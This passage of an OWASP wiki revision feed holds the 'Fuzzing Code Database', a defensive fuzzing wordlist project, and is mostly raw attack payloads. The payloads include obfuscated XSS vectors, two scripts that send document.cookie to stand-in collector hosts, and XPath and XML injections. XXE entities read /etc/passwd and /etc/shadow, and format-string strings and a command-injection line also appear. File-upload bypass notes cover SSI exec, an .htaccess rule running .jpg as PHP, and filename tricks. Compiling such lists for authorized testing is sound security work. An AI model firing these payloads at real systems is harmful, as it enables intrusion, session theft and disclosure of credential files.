ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80063</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80063"/>
				<updated>2010-03-17T20:41:00Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 - notes ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htacces in an upload folder on Apache httpd, try setting .jpg to executable&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&lt;br /&gt;
# Commonly writable directories&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) ===&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
